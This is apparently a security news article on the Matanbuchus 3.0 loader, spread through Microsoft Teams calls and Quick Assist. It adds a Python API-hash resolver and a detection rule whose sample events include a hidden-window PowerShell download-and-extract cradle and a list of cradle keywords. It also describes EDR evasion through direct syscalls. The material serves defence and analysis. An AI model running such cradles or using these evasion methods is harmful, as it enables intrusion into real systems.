Matanbuchus 3.0 Leverages Microsoft Teams Voice Calls in Sophisticated Social Engineering Attacks
Malicious actors are weaponizing Microsoft Teams voice calls to distribute an upgraded version of the Matanbuchus malware loader in highly targeted social engineering attacks, posing as corporate IT support to compromise victims. The campaign, analyzed in-depth by researchers at Morphisec, reveals significant enhancements in Matanbuchus 3.0's evasion, obfuscation, and post-compromise capabilities, making it a formidable threat to enterprise environments.
The Attack Chain: From Teams Call to Full Compromise
The intrusion begins with an external Microsoft Teams call. Attackers, masquerading as legitimate IT helpdesk personnel, convince the target to launch Windows' built-in Quick Assist tool. Once remote control is established, the victim is instructed to execute a malicious PowerShell script. This script downloads and extracts a ZIP archive containing three files, which deploy the Matanbuchus loader onto the device via DLL side-loading.
Image source: Morphisec
Matanbuchus 3.0: A Major Evolution in Stealth and Capability
Morphisec's analysis highlights substantial upgrades in this iteration:
- Enhanced Evasion & Obfuscation: The loader switched C2 communication and string obfuscation from RC4 to the Salsa20 algorithm. Crucially, it now bypasses security monitoring by issuing syscalls directly from custom shellcode instead of calling Windows API functions, sidestepping the user-mode hooks EDR products place on those functions. API names are stored as MurmurHash3 hashes rather than plaintext strings and resolved at run time, which hinders static analysis.
- Anti-Analysis Measures: A new anti-sandbox routine verifies the victim's locale before execution, ensuring the malware only runs on intended targets. It also performs detailed reconnaissance, collecting usernames, domains, OS build info, running security processes (EDR/AV), and user privilege levels.
- Expanded Payload Delivery: Matanbuchus 3.0 can execute various payloads directly in memory, including CMD commands, PowerShell scripts, EXE/DLL/MSI files, and shellcode. Its execution methods are dynamically tailored based on the victim's specific security stack.
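The API-hashing point above is easier to appreciate with the analyst's side of it in hand. The following added example (written for this page, not Morphisec's code or anything recovered from the loader) implements the 32-bit x86 variant of MurmurHash3 in pure Python and uses it to build a reverse lookup table, so that hash constants pulled from a sample can be mapped back to API names. The seed value, the candidate API list and the encoding of names are assumptions; the real loader may use a different seed, a different MurmurHash3 variant, or case-normalized names, so in practice an analyst tries several seeds against the full export tables of the relevant DLLs.

```python
import struct

MASK32 = 0xFFFFFFFF


def rotl32(x: int, r: int) -> int:
    """Rotate a 32-bit value left by r bits."""
    return ((x << r) | (x >> (32 - r))) & MASK32


def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32 (Austin Appleby's 32-bit variant), returned unsigned."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    h = seed & MASK32
    nblocks = len(data) // 4
    # Body: mix each little-endian 4-byte block into the state.
    for i in range(nblocks):
        k = struct.unpack_from("<I", data, i * 4)[0]
        k = (k * c1) & MASK32
        k = rotl32(k, 15)
        k = (k * c2) & MASK32
        h ^= k
        h = rotl32(h, 13)
        h = (h * 5 + 0xE6546B64) & MASK32
    # Tail: the remaining 1-3 bytes are packed little-endian and mixed once.
    tail = data[nblocks * 4:]
    k = 0
    if len(tail) >= 3:
        k ^= tail[2] << 16
    if len(tail) >= 2:
        k ^= tail[1] << 8
    if len(tail) >= 1:
        k ^= tail[0]
        k = (k * c1) & MASK32
        k = rotl32(k, 15)
        k = (k * c2) & MASK32
        h ^= k
    # Finalization: fold in the length, then fmix32 avalanche.
    h ^= len(data)
    h ^= h >> 16
    h = (h * 0x85EBCA6B) & MASK32
    h ^= h >> 13
    h = (h * 0xC2B2AE35) & MASK32
    h ^= h >> 16
    return h


# Constructed candidate list (assumption): the APIs a loader typically resolves.
# Real analysis feeds in the full export tables of kernel32, ntdll, winhttp, etc.
CANDIDATE_APIS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateThread", "NtAllocateVirtualMemory", "NtProtectVirtualMemory",
    "NtCreateThreadEx", "WinHttpOpen", "GetUserNameW", "GetLocaleInfoW",
]


def build_hash_table(names, seed: int = 0) -> dict:
    """Map hash -> API name for one assumed seed (names hashed as ASCII bytes)."""
    return {murmur3_32(n.encode("ascii"), seed): n for n in names}


def resolve_hashes(hashes, names=CANDIDATE_APIS, seed: int = 0) -> dict:
    """Resolve hash constants recovered from a sample; unknowns are labelled."""
    table = build_hash_table(names, seed)
    return {h: table.get(h, "<unknown>") for h in hashes}


if __name__ == "__main__":
    # Constructed "recovered" constants: hashes of two known names plus one unknown.
    recovered = [murmur3_32(b"VirtualAlloc"), murmur3_32(b"NtCreateThreadEx"), 0xDEADBEEF]
    for h, name in resolve_hashes(recovered).items():
        print(f"{h:#010x} -> {name}")
```

The hash constants in a real sample are usually compared against the hash of each export name walked from a DLL's export directory; a precomputed table like the one above lets the analyst label them statically instead of stepping through the resolver in a debugger. Two checks worth keeping in the script: `murmur3_32(b"")` must be `0` and `murmur3_32(b"", 1)` must be `0x514E28B7`, the reference implementation's test vectors, so a transcription error in the constants is caught before any hash is trusted.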
Why This Matters: The Escalating Threat to Collaboration Platforms
This campaign exemplifies a disturbing trend of attackers relentlessly targeting trusted communication channels like Microsoft Teams. The platform's "External Access" feature, if configured loosely, provides fertile ground for social engineering. Matanbuchus 3.0's technical sophistication signifies a dangerous evolution:
- Increased Stealth: Direct syscalls and advanced obfuscation make detection significantly harder for traditional security tools.
- Precision Targeting: The use of Quick Assist and tailored payloads indicates attackers are investing heavily in operational success per victim.
- Broad Impact Potential: As a Malware-as-a-Service (MaaS) offering, this enhanced loader lowers the barrier for other threat actors to conduct sophisticated attacks.
Mitigation and Vigilance Required
Organizations must reassess their Microsoft Teams security posture, particularly scrutinizing "External Access" settings and user training regarding unsolicited support requests. Vigilant monitoring of PowerShell execution and Quick Assist usage is critical. Morphisec emphasizes that Matanbuchus has matured "into a sophisticated threat," demanding layered defenses capable of detecting complex in-memory execution and living-off-the-land techniques. The technical details and Indicators of Compromise (IoCs) provided by Morphisec offer essential resources for defenders hunting this evolving menace.
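The attack chain described earlier (Quick Assist session, then a PowerShell script that downloads and extracts a ZIP) and the monitoring advice above can be turned into one concrete correlation rule. The following added example is not from Morphisec or the original report; it is a defender-side sketch that runs over constructed process-creation events in a Sysmon Event ID 1 style and flags a PowerShell download-or-extract cradle launched by a user who started Quick Assist shortly before. The 30-minute window, the field names, the QuickAssist.exe path and the cradle keyword list are all assumptions to be tuned against real telemetry (Sysmon, or Security event 4688 with command-line auditing enabled).

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    """Minimal process-creation record (field names modelled on Sysmon EID 1)."""
    utc_time: datetime
    user: str
    image: str
    parent_image: str
    command_line: str


# Keywords that indicate a download or archive-extraction cradle (assumed list).
CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|expand-archive"
    r"|-encodedcommand|\s-enc?\s",
    re.IGNORECASE,
)


def is_cradle(command_line: str) -> bool:
    """True when the PowerShell command line looks like a download/extract cradle."""
    return CRADLE.search(command_line) is not None


def detect_quick_assist_cradles(events, window=timedelta(minutes=30)):
    """Alert when the same user runs a PowerShell cradle within `window` of
    starting QuickAssist.exe. Returns one dict per alert."""
    alerts = []
    quick_assist_started = {}  # user -> most recent Quick Assist launch time
    for e in sorted(events, key=lambda ev: ev.utc_time):
        exe = e.image.rsplit("\\", 1)[-1].lower()
        if exe == "quickassist.exe":
            quick_assist_started[e.user] = e.utc_time
            continue
        if exe in ("powershell.exe", "pwsh.exe") and is_cradle(e.command_line):
            started = quick_assist_started.get(e.user)
            if started is not None and timedelta(0) <= e.utc_time - started <= window:
                alerts.append({
                    "user": e.user,
                    "quick_assist_at": started,
                    "powershell_at": e.utc_time,
                    "command_line": e.command_line,
                })
    return alerts


# Constructed sample events (not real telemetry). Paths and users are made up.
QA_PATH = r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe"  # constructed
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(datetime(2025, 7, 16, 14, 2, 11), r"CORP\alice", r"C:\Windows\System32\notepad.exe",
              r"C:\Windows\explorer.exe", "notepad.exe"),
    ProcEvent(datetime(2025, 7, 16, 14, 5, 40), r"CORP\alice", QA_PATH,
              r"C:\Windows\explorer.exe", "QuickAssist.exe"),
    ProcEvent(datetime(2025, 7, 16, 14, 9, 3), r"CORP\alice", PS_PATH, r"C:\Windows\explorer.exe",
              'powershell.exe -nop -w hidden -c "Invoke-WebRequest -Uri https://example.invalid/u.zip '
              '-OutFile $env:TEMP\\u.zip; Expand-Archive $env:TEMP\\u.zip $env:TEMP\\u"'),
    ProcEvent(datetime(2025, 7, 16, 14, 20, 0), r"CORP\bob", PS_PATH, r"C:\Windows\explorer.exe",
              "powershell.exe Get-ChildItem C:\\logs"),
    ProcEvent(datetime(2025, 7, 16, 16, 30, 0), r"CORP\carol", PS_PATH, r"C:\Windows\explorer.exe",
              "powershell.exe Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile tool.zip"),
    ProcEvent(datetime(2025, 7, 16, 15, 0, 0), r"CORP\alice", PS_PATH, r"C:\Windows\explorer.exe",
              "powershell.exe Get-Date"),
]


if __name__ == "__main__":
    for a in detect_quick_assist_cradles(SAMPLE_EVENTS):
        print(f"ALERT user={a['user']} quick_assist={a['quick_assist_at']:%H:%M} "
              f"powershell={a['powershell_at']:%H:%M}\n  {a['command_line']}")
```

Only alice's cradle produces an alert: bob's PowerShell has no download keywords, carol's download happens with no Quick Assist session in the window, and alice's later `Get-Date` is benign. Keeping the rule a sequence (Quick Assist, then cradle, same user) rather than a single keyword match is what keeps it quiet on help-desk teams and developers who use either tool legitimately; the single-keyword hits are still worth logging at low severity for hunting.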
Source: Analysis based on research by Morphisec, originally reported by BleepingComputer (https://www.bleepingcomputer.com/news/security/microsoft-teams-voice-calls-abused-to-push-matanbuchus-malware/).